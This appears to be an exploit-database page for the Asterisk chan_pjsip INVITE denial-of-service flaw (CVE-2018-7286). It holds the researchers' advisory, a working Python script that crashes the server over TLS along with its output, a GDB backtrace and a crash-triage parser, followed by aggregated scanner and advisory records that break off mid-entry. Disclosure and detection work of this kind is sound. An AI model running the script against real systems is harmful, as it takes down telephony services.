Asterisk chan_pjsip 15.2.0 - INVITE Denial of Service
2018-02-27T00:00:00
ID EXPLOITPACK:5E0056701181B58A00B53B40BB14766A Type exploitpack Reporter EnableSecurity Modified 2018-02-27T00:00:00
Description
'''
# Crash occurs when sending a repeated number of INVITE messages over TCP or TLS transport
- Authors:
  - Alfred Farrugia <alfred@enablesecurity.com>
  - Sandro Gauci <sandro@enablesecurity.com>
- Latest vulnerable version: Asterisk 15.2.0 running `chan_pjsip` installed with `--with-pjproject-bundled`
- References: AST-2018-005, CVE-2018-7286
- Enable Security Advisory: <https://github.com/EnableSecurity/advisories/tree/master/ES2018-04-asterisk-pjsip-tcp-segfault>
- Vendor Advisory: <http://downloads.asterisk.org/pub/security/AST-2018-005.html>
- Tested vulnerable versions: 15.2.0, 15.1.0, 15.0.0, 13.19.0, 13.11.2, 14.7.5
- Timeline:
  - Issue reported to vendor: 2018-01-24
  - Vendor patch made available to us: 2018-02-05
  - Vendor advisory published: 2018-02-21
  - Enable Security advisory: 2018-02-22
## Description
A crash occurs when a number of INVITE messages are sent over TCP or TLS and
then the connection is suddenly closed. This issue leads to a segmentation fault.
## Impact
Abuse of this vulnerability leads to denial of service in Asterisk when
`chan_pjsip` is in use.
## How to reproduce the issue
The following script was used to reproduce the issue on a TLS connection:
'''
# Python 2 script (uses the `md5` module and `except X, err` syntax).
import md5
import re
import socket
import ssl
import uuid
from time import sleep

SERVER_IP = "127.0.0.1"
SERVER_PORT = 5061
USERNAME = "3000"
PASSWORD = "3000"
INVITE_USERNAME = "3000"

errno = 0
lasterrno = 0
while True:
    try:
        # Each pass opens a fresh TLS connection to the test server.
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock = ssl.wrap_socket(sock,
                               ssl_version=ssl.PROTOCOL_TLSv1,
                               )

        sock.connect((SERVER_IP, SERVER_PORT))
        sock.settimeout(0.5)
        errno = 0
        callid = str(uuid.uuid4())
        for ix in range(10):
            sdpbody = ""

            # INVITE template; {{AUTH}} is replaced by the Authorization
            # header once the server has issued a digest challenge.
            msg = "INVITE sip:%s@%s:%i SIP/2.0\r\n" \
                "To: <sip:%s@%s:%i>\r\n" \
                "From: Test <sip:%s@%s:%s>\r\n" \
                "Call-ID: %s\r\n" \
                "CSeq: 2 INVITE\r\n" \
                "Via: SIP/2.0/TLS 172.17.0.1:10394;branch=z9hG4bK%s\r\n" \
                "Contact: <sip:%s@172.17.0.1>\r\n" \
                "Content-Type: application/sdp\r\n" \
                "{{AUTH}}" \
                "Content-Length: %i\r\n" \
                "\r\n" % (
                    INVITE_USERNAME, SERVER_IP, SERVER_PORT,
                    INVITE_USERNAME, SERVER_IP, SERVER_PORT,
                    USERNAME, SERVER_IP, SERVER_PORT,
                    callid, callid,
                    USERNAME, len(sdpbody)
                ) + \
                sdpbody

            sock.sendall(msg.replace("{{AUTH}}", ""))

            data = sock.recv(10240)
            # print(data)
            if data.startswith("SIP/2.0 401"):
                # Answer the digest challenge from WWW-Authenticate.
                for line in data.split('\r\n'):
                    if line.startswith("WWW-Authenticate"):
                        content = line.split(':', 2)[1].strip()
                        realm = re.search(
                            "realm=\"([a-z]+)\"", content).group(1)
                        nonce = re.search(
                            "nonce=\"([a-z0-9\/]+)\"", content).group(1)
                        ha1 = md5.new(USERNAME + ":" + realm +
                                      ":" + PASSWORD).hexdigest()
                        uri = "sip:%s:%i" % (SERVER_IP, SERVER_PORT)
                        ha2 = md5.new("INVITE:" + uri).hexdigest()
                        r = md5.new(ha1 + ":" + nonce + ":" + ha2).hexdigest()

                        auth = "Authorization: Digest username=\"%s\"," % (USERNAME) + \
                            "realm=\"%s\"," % (realm) + \
                            "nonce=\"%s\"," % (nonce) + \
                            "uri=\"%s\"," % (uri) + \
                            "response=\"%s\"," % (r) + \
                            "algorithm=md5\r\n"
                        print(auth)

                sock.sendall(msg.replace("{{AUTH}}", auth))
                errno = 0
    except (socket.error, ssl.SSLEOFError), err:
        # Connection errors are counted; ten in a row means the
        # server is no longer accepting connections.
        print(err)
        print("getting close!")
        sleep(2)
        errno += 1
        if errno >= 10:
            print("confirmed dead")
            break
        elif errno > lasterrno:
            lasterrno = errno
            continue
'''
The output from the tool should show the following:
```
> python test.py
Authorization: Digest username="3000",realm="asterisk",nonce="1516728889/07e2e34fbd45ed7f6b1bca0d2bde50ae",uri="sip:127.0.0.1:5061",response="a2b7e2bfa722730b64787664db474f2a",algorithm=md5
EOF occurred in violation of protocol (_ssl.c:590)
getting close!
[Errno 111] Connection refused
getting close!
[Errno 111] Connection refused
getting close!
[Errno 111] Connection refused
getting close!
[Errno 111] Connection refused
getting close!
[Errno 111] Connection refused
getting close!
[Errno 111] Connection refused
getting close!
[Errno 111] Connection refused
getting close!
[Errno 111] Connection refused
getting close!
[Errno 111] Connection refused
getting close!
confirmed dead
```
Notes:
- authentication may be required
- the destination SIP address should match a valid extension in the dialplan
- similar code to the above can be used to reproduce the issue on TCP transport
### GDB backtrace result
```
gdb --args /opt/asterisk/sbin/asterisk -fcvvv
Thread 25 "asterisk" received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7ffff030a700 (LWP 133)]
ast_sip_failover_request (tdata=0x0) at res_pjsip.c:3956
3956 if (!tdata->dest_info.addr.count || (tdata->dest_info.cur_addr == tdata->dest_info.addr.count - 1)) {
(gdb) bt
#0 ast_sip_failover_request (tdata=0x0) at res_pjsip.c:3956
#1 0x00007ffff1a8dbb1 in check_request_status (inv=inv@entry=0x7fff9910bac8, e=0x7ffff0308ae0) at res_pjsip_session.c:3371
#2 0x00007ffff1a8dc83 in session_inv_on_state_changed (inv=0x7fff9910bac8, e=0x7ffff0308ae0) at res_pjsip_session.c:3455
#3 0x00007ffff7848217 in inv_set_state (state=PJSIP_INV_STATE_DISCONNECTED, e=0x7ffff0308ae0, inv=0x7fff9910bac8) at ../src/pjsip-ua/sip_inv.c:317
#4 inv_on_state_null (inv=0x7fff9910bac8, e=0x7ffff0308ae0) at ../src/pjsip-ua/sip_inv.c:3890
#5 0x00007ffff7841a77 in mod_inv_on_tsx_state (tsx=0x7fff99116408, e=0x7ffff0308ae0) at ../src/pjsip-ua/sip_inv.c:717
#6 0x00007ffff788299d in pjsip_dlg_on_tsx_state (dlg=0x7fff990eccc8, tsx=0x7fff99116408, e=0x7ffff0308ae0) at ../src/pjsip/sip_dialog.c:2066
#7 0x00007ffff787b513 in tsx_set_state (tsx=0x7fff99116408, state=PJSIP_TSX_STATE_TERMINATED, event_src_type=PJSIP_EVENT_TRANSPORT_ERROR, event_src=0x7fff9910fda8, flag=0)
at ../src/pjsip/sip_transaction.c:1267
#8 0x00007ffff787cfec in send_msg_callback (send_state=0x7fff9918d2f0, sent=-171064, cont=0x7ffff0308c04) at ../src/pjsip/sip_transaction.c:1970
#9 0x00007ffff78661ae in send_response_resolver_cb (status=<optimized out>, token=0x7fff9918d2f0, addr=0x7ffff0308c60) at ../src/pjsip/sip_util.c:1721
#10 0x00007ffff184df8c in sip_resolve (resolver=<optimized out>, pool=<optimized out>, target=0x7fff99116530, token=0x7fff9918d2f0, cb=0x7ffff78660f0 <send_response_resolver_cb>)
at res_pjsip/pjsip_resolver.c:527
#11 0x00007ffff7869adb in pjsip_resolve (resolver=0x1b64d40, pool=<optimized out>, target=target@entry=0x7fff99116530, token=token@entry=0x7fff9918d2f0,
cb=cb@entry=0x7ffff78660f0 <send_response_resolver_cb>) at ../src/pjsip/sip_resolve.c:209
#12 0x00007ffff78652b9 in pjsip_endpt_resolve (endpt=endpt@entry=0x1638d28, pool=<optimized out>, target=target@entry=0x7fff99116530, token=token@entry=0x7fff9918d2f0,
cb=cb@entry=0x7ffff78660f0 <send_response_resolver_cb>) at ../src/pjsip/sip_endpoint.c:1164
#13 0x00007ffff7867fe1 in pjsip_endpt_send_response (endpt=0x1638d28, res_addr=res_addr@entry=0x7fff99116508, tdata=tdata@entry=0x7fff9910fda8, token=token@entry=0x7fff99116408,
cb=cb@entry=0x7ffff787cd80 <send_msg_callback>) at ../src/pjsip/sip_util.c:1796
#14 0x00007ffff787bdac in tsx_send_msg (tsx=0x7fff99116408, tdata=0x7fff9910fda8) at ../src/pjsip/sip_transaction.c:2237
#15 0x00007ffff787dc67 in tsx_on_state_proceeding_uas (event=0x7ffff0309b30, tsx=0x7fff99116408) at ../src/pjsip/sip_transaction.c:2704
#16 tsx_on_state_trying (tsx=0x7fff99116408, event=0x7ffff0309b30) at ../src/pjsip/sip_transaction.c:2634
#17 0x00007ffff787fba7 in pjsip_tsx_send_msg (tsx=tsx@entry=0x7fff99116408, tdata=tdata@entry=0x7fff9910fda8) at ../src/pjsip/sip_transaction.c:1789
#18 0x00007ffff78822a3 in pjsip_dlg_send_response (dlg=0x7fff990eccc8, tsx=0x7fff99116408, tdata=tdata@entry=0x7fff9910fda8) at ../src/pjsip/sip_dialog.c:1531
#19 0x00007ffff784519a in pjsip_inv_send_msg (inv=0x7fff9910bac8, tdata=0x7fff9910fda8) at ../src/pjsip-ua/sip_inv.c:3231
#20 0x00007ffff1a8c043 in ast_sip_session_send_response (session=session@entry=0x7fff9910e208, tdata=<optimized out>) at res_pjsip_session.c:1712
#21 0x00007ffff1a8ec09 in new_invite (invite=<synthetic pointer>) at res_pjsip_session.c:2963
#22 handle_new_invite_request (rdata=0x7fff9524ce58) at res_pjsip_session.c:3062
#23 session_on_rx_request (rdata=0x7fff9524ce58) at res_pjsip_session.c:3126
#24 0x00007ffff7864e97 in pjsip_endpt_process_rx_data (endpt=<optimized out>, rdata=rdata@entry=0x7fff9524ce58, p=p@entry=0x7ffff1a7ed00 <param>,
p_handled=p_handled@entry=0x7ffff0309d44) at ../src/pjsip/sip_endpoint.c:893
#25 0x00007ffff185427f in distribute (data=0x7fff9524ce58) at res_pjsip/pjsip_distributor.c:903
#26 0x00000000005fc6fe in ast_taskprocessor_execute (tps=tps@entry=0x1cf2b08) at taskprocessor.c:963
#27 0x0000000000603960 in execute_tasks (data=0x1cf2b08) at threadpool.c:1322
#28 0x00000000005fc6fe in ast_taskprocessor_execute (tps=0x16343d8) at taskprocessor.c:963
#29 0x0000000000603e40 in threadpool_execute (pool=0x1637b78) at threadpool.c:351
#30 worker_active (worker=0x7fffa0000948) at threadpool.c:1105
#31 worker_start (arg=arg@entry=0x7fffa0000948) at threadpool.c:1024
#32 0x000000000060eddd in dummy_start (data=<optimized out>) at utils.c:1257
#33 0x00007ffff5e366ba in start_thread (arg=0x7ffff030a700) at pthread_create.c:333
#34 0x00007ffff541f3dd in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:109
(gdb)
```
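A crash-triage helper for the backtrace above, added here as an example (it is not part of the Enable Security advisory or of Asterisk): it parses GDB `bt` output, re-joins frames that GDB wrapped across lines, and checks for the signature shown on this page. The names `parse_backtrace` and `triage` are hypothetical, `SAMPLE_BT` is an excerpt of the session above, and `OTHER_BT` is constructed.

```python
import re

# Excerpt of the GDB session shown above (most frames omitted for brevity).
SAMPLE_BT = """\
Thread 25 "asterisk" received signal SIGSEGV, Segmentation fault.
ast_sip_failover_request (tdata=0x0) at res_pjsip.c:3956
(gdb) bt
#0  ast_sip_failover_request (tdata=0x0) at res_pjsip.c:3956
#1  0x00007ffff1a8dbb1 in check_request_status (inv=inv@entry=0x7fff9910bac8, e=0x7ffff0308ae0) at res_pjsip_session.c:3371
#7  0x00007ffff787b513 in tsx_set_state (tsx=0x7fff99116408, state=PJSIP_TSX_STATE_TERMINATED, event_src_type=PJSIP_EVENT_TRANSPORT_ERROR, event_src=0x7fff9910fda8, flag=0)
    at ../src/pjsip/sip_transaction.c:1267
#22 handle_new_invite_request (rdata=0x7fff9524ce58) at res_pjsip_session.c:3062
#34 0x00007ffff541f3dd in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:109
(gdb)
"""

# Constructed counter-example: same function on top, but tdata is not NULL.
OTHER_BT = """\
(gdb) bt
#0  ast_sip_failover_request (tdata=0x7fff9910fda8) at res_pjsip.c:3956
#1  0x00007ffff1a8dbb1 in check_request_status (inv=inv@entry=0x7fff9910bac8, e=0x7ffff0308ae0) at res_pjsip_session.c:3371
"""

FRAME_RE = re.compile(
    r"^#(?P<num>\d+)\s+(?:0x[0-9a-f]+ in )?(?P<func>\S+) \((?P<args>.*?)\)"
    r"(?:\s+(?:at (?P<file>\S+):(?P<line>\d+)|from \S+))?$"
)


def split_frames(text):
    """Yield one string per frame, re-joining frames GDB wrapped over lines."""
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if re.match(r"#\d+\s", line):
            if current is not None:
                yield current
            current = line
        elif not line or line.startswith("(gdb)"):
            if current is not None:
                yield current
            current = None
        elif current is not None:
            current += " " + line  # continuation such as "at file.c:123"
    if current is not None:
        yield current


def parse_args(argstr):
    """Turn 'a=0x1, b=b@entry=0x2' into {'a': '0x1', 'b': '0x2'}."""
    args = {}
    for part in filter(None, (p.strip() for p in argstr.split(", "))):
        name, _, value = part.partition("=")
        # GDB prints "name=name@entry=value" for values captured at entry.
        args[name] = value.rsplit("@entry=", 1)[-1]
    return args


def parse_backtrace(text):
    """Return a list of frame dicts in the order GDB printed them."""
    frames = []
    for joined in split_frames(text):
        m = FRAME_RE.match(joined)
        if m:
            frames.append({
                "num": int(m.group("num")),
                "func": m.group("func"),
                "args": parse_args(m.group("args")),
                "file": m.group("file"),
                "line": int(m.group("line")) if m.group("line") else None,
            })
    return frames


def triage(text):
    """Check a backtrace against the crash signature shown on this page."""
    frames = parse_backtrace(text)
    top = frames[0] if frames and frames[0]["num"] == 0 else None
    # Frame 0 dereferences tdata, which is NULL in the reported crash.
    null_tdata = (bool(top) and top["func"] == "ast_sip_failover_request"
                  and top["args"].get("tdata") == "0x0")
    # The transaction was terminated by a transport error (closed connection).
    transport_error = any(
        f["args"].get("event_src_type") == "PJSIP_EVENT_TRANSPORT_ERROR"
        for f in frames)
    # The worker thread was handling a new INVITE when it happened.
    invite_path = any(f["func"] == "handle_new_invite_request" for f in frames)
    return {
        "null_tdata": null_tdata,
        "transport_error": transport_error,
        "invite_path": invite_path,
        "match": null_tdata and transport_error and invite_path,
    }


if __name__ == "__main__":
    print(triage(SAMPLE_BT))
    print(triage(OTHER_BT))
```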
## Solutions and recommendations
Apply the patch issued by Asterisk at <http://www.asterisk.org/security> or upgrade to the latest release.
## About Enable Security
[Enable Security](https://www.enablesecurity.com) provides Information Security services, including Penetration Testing, Research and Development, to help protect client networks and applications against online attackers.
## Disclaimer
The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
'''
\n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/146580/ES2018-04.txt"}], "zdt": [{"lastseen": "2018-03-09T21:11:28", "description": "Asterisk running chan_pjsip suffers from an INVITE message denial of service vulnerability. Versions affected include 15.2.0, 15.1.0, 15.0.0, 13.19.0, 13.11.2, and 14.7.5.", "edition": 1, "published": "2018-02-27T00:00:00", "type": "zdt", "title": "Asterisk 15.2.0 chan_pjsip INVITE Denial Of Service Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-7286"], "modified": "2018-02-27T00:00:00", "href": "https://0day.today/exploit/description/29889", "id": "1337DAY-ID-29889", "sourceData": "# Crash occurs when sending a repeated number of INVITE messages over TCP or TLS transport\r\n\r\n- Authors:\r\n - Alfred Farrugia <alfred@enablesecurity.com>\r\n - Sandro Gauci <sandro@enablesecurity.com>\r\n- Latest vulnerable version: Asterisk 15.2.0 running `chan_pjsip` installed with `--with-pjproject-bundled`\r\n- References: AST-2018-005, CVE-2018-7286\r\n- Enable Security Advisory: <https://github.com/EnableSecurity/advisories/tree/master/ES2018-04-asterisk-pjsip-tcp-segfault>\r\n- Vendor Advisory: <http://downloads.asterisk.org/pub/security/AST-2018-005.html>\r\n- Tested vulnerable versions: 15.2.0, 15.1.0, 15.0.0, 13.19.0, 13.11.2, 14.7.5\r\n- Timeline:\r\n - Issue reported to vendor: 2018-01-24\r\n - Vendor patch made available to us: 2018-02-05\r\n - Vendor advisory published: 2018-02-21\r\n - Enable Security advisory: 2018-02-22\r\n\r\n## Description\r\n\r\nA crash occurs when a number of INVITE messages are sent over TCP or TLS and\r\nthen the connection is suddenly closed. This issue leads to a segmentation fault.
\r\n\r\n## Solutions and recommendations\r\n\r\nApply the patch issued by Asterisk at <http://www.asterisk.org/security> or upgrade to the latest release.\n\n# 0day.today [2018-03-09] #", "sourceHref": "https://0day.today/exploit/29889", "cvss": {"score": 0.0, "vector": "NONE"}}], "openvas": [{"lastseen": "2019-05-29T18:32:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7286", "CVE-2018-7284"], "description": "Asterisk is prone to multiple vulnerabilities.", "modified": "2018-10-26T00:00:00", "published": "2018-02-22T00:00:00", "id": "OPENVAS:1361412562310140792", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140792", "type": "openvas", "title": "Asterisk Multiple Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability
Test\n# $Id: gb_asterisk_mult_vuln_feb18.nasl 12120 2018-10-26 11:13:20Z mmartin $\n#\n# Asterisk Multiple Vulnerabilities\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:digium:asterisk';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140792\");\n script_version(\"$Revision: 12120 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 13:13:20 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-02-22 11:26:42 +0700 (Thu, 22 Feb 2018)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_cve_id(\"CVE-2018-7284\", \"CVE-2018-7286\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Asterisk Multiple Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_asterisk_detect.nasl\");\n 
script_mandatory_keys(\"Asterisk-PBX/Installed\");\n\n script_tag(name:\"summary\", value:\"Asterisk is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Asterisk is prone to multiple vulnerabilities:\n\n - Crash when given an invalid SDP media format description\n\n - Crash with an invalid SDP fmtp attribute\n\n - Crash when receiving SUBSCRIBE request (CVE-2018-7284)\n\n - Crash when large numbers of TCP connections are closed suddenly (CVE-2018-7286)\");\n\n script_tag(name:\"affected\", value:\"Asterisk Open Source 13.x, 14.x, 15.x and Certified Asterisk 13.18.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Version 13.19.2, 14.7.6, 15.2.2, 13.18-cert3 or later.\");\n\n script_xref(name:\"URL\", value:\"http://downloads.asterisk.org/pub/security/AST-2018-002.html\");\n script_xref(name:\"URL\", value:\"http://downloads.asterisk.org/pub/security/AST-2018-003.html\");\n script_xref(name:\"URL\", value:\"http://downloads.asterisk.org/pub/security/AST-2018-004.html\");\n script_xref(name:\"URL\", value:\"http://downloads.asterisk.org/pub/security/AST-2018-005.html\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"revisions-lib.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version =~ \"^13\\.\") {\n if (version =~ \"^13\\.18cert\") {\n if (revcomp(a: version, b: \"13.18cert3\") < 0) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"13.18-cert3\");\n security_message(port: port, data: report, proto: \"udp\");\n exit(0);\n }\n }\n else {\n if (version_is_less(version: version, test_version: \"13.19.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"13.19.2\");\n security_message(port: port, data: report, proto: \"udp\");\n exit(0);\n }\n 
}\n}\n\nif (version =~ \"^14\\.\") {\n if (version_is_less(version: version, test_version: \"14.7.6\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"14.7.6\");\n security_message(port: port, data: report, proto: \"udp\");\n exit(0);\n }\n}\n\nif (version =~ \"^15\\.\") {\n if (version_is_less(version: version, test_version: \"15.2.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"15.2.2\");\n security_message(port: port, data: report, proto: \"udp\");\n exit(0);\n }\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-07-04T18:56:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7286", "CVE-2018-12227", "CVE-2018-7284", "CVE-2018-17281"], "description": "Multiple vulnerabilities have been discovered in Asterisk, an open source\nPBX and telephony toolkit, which may result in denial of service or\ninformation disclosure.", "modified": "2019-07-04T00:00:00", "published": "2018-10-16T00:00:00", "id": "OPENVAS:1361412562310704320", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704320", "type": "openvas", "title": "Debian Security Advisory DSA 4320-1 (asterisk - security update)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Auto-generated from advisory DSA 4320-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be 
useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704320\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2018-12227\", \"CVE-2018-17281\", \"CVE-2018-7284\", \"CVE-2018-7286\");\n script_name(\"Debian Security Advisory DSA 4320-1 (asterisk - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-10-16 00:00:00 +0200 (Tue, 16 Oct 2018)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2018/dsa-4320.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n script_tag(name:\"affected\", value:\"asterisk on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (stretch), these problems have been fixed in\nversion 1:13.14.1~dfsg-2+deb9u4.\n\nWe recommend that you upgrade your asterisk packages.\");\n\n script_xref(name:\"URL\", 
value:\"https://security-tracker.debian.org/tracker/asterisk\");\n script_tag(name:\"summary\", value:\"Multiple vulnerabilities have been discovered in Asterisk, an open source\nPBX and telephony toolkit, which may result in denial of service or\ninformation disclosure.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"asterisk\", ver:\"1:13.14.1~dfsg-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"asterisk-config\", ver:\"1:13.14.1~dfsg-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"asterisk-dahdi\", ver:\"1:13.14.1~dfsg-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"asterisk-dev\", ver:\"1:13.14.1~dfsg-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"asterisk-doc\", ver:\"1:13.14.1~dfsg-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"asterisk-mobile\", ver:\"1:13.14.1~dfsg-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"asterisk-modules\", ver:\"1:13.14.1~dfsg-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"asterisk-mp3\", ver:\"1:13.14.1~dfsg-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"asterisk-mysql\", ver:\"1:13.14.1~dfsg-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"asterisk-ooh323\", ver:\"1:13.14.1~dfsg-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"asterisk-voicemail\", ver:\"1:13.14.1~dfsg-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"asterisk-voicemail-imapstorage\", ver:\"1:13.14.1~dfsg-2+deb9u4\", rls:\"DEB9\"))) {\n 
report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"asterisk-voicemail-odbcstorage\", ver:\"1:13.14.1~dfsg-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"asterisk-vpb\", ver:\"1:13.14.1~dfsg-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "freebsd": [{"lastseen": "2019-05-29T18:32:00", "bulletinFamily": "unix", "cvelist": ["CVE-2018-7286", "CVE-2018-7284"], "description": "\nThe Asterisk project reports:\n\nAST-2018-004 - When processing a SUBSCRIBE request the\n\t res_pjsip_pubsub module stores the accepted formats present\n\t in the Accept headers of the request. This code did not\n\t limit the number of headers it processed despite having\n\t a fixed limit of 32. If more than 32 Accept headers were\n\t present the code would write outside of its memory and\n\t cause a crash.\nAST-2018-005 - A crash occurs when a number of\n\t authenticated INVITE messages are sent over TCP or TLS\n\t and then the connection is suddenly closed. This issue\n\t leads to a segmentation fault.\n\n", "edition": 7, "modified": "2018-06-12T00:00:00", "published": "2018-02-21T00:00:00", "id": "933654CE-17B8-11E8-90B8-001999F8D30B", "href": "https://vuxml.freebsd.org/freebsd/933654ce-17b8-11e8-90b8-001999f8d30b.html", "title": "asterisk -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "nessus": [{"lastseen": "2021-01-01T01:21:47", "description": "According to its SIP banner, the version of Asterisk running on the\nremote host is 13.x prior to 13.19.2, 14.x prior to 14.7.6, or 13.18\nprior to 13.18-cert3. 
